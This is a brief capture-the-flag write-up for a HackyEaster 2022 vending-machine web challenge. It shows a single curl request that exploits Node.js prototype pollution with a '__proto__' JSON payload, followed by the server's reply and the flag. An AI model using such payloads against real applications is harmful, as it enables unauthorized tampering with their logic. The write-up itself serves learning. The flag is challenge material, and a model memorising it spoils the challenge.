Home HackyEaster 2022 自動販売機
Writeup
Cancel

自動販売機

Challenge

I like these Japanese vending machines! ๑(◕‿◕)๑

If I could just get a 🚩…

http://46.101.107.117:2210

Solution

Based on some chatter in discord, we used the attack described here: https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution

1
2
$ curl --silent 'http://46.101.107.117:2210/order' -X POST -H 'Content-Type: application/json' --data-raw '{"__proto__": {"amount": 6, "item": "🚩"}}'
お楽しみください 🚩: he2022{p0llut10n_41nt_g00d}%

Flag

he2022{p0llut10n_41nt_g00d}